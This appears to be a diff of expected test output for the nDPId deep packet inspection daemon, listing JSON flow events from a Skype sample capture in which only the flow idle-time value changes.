00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642244,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 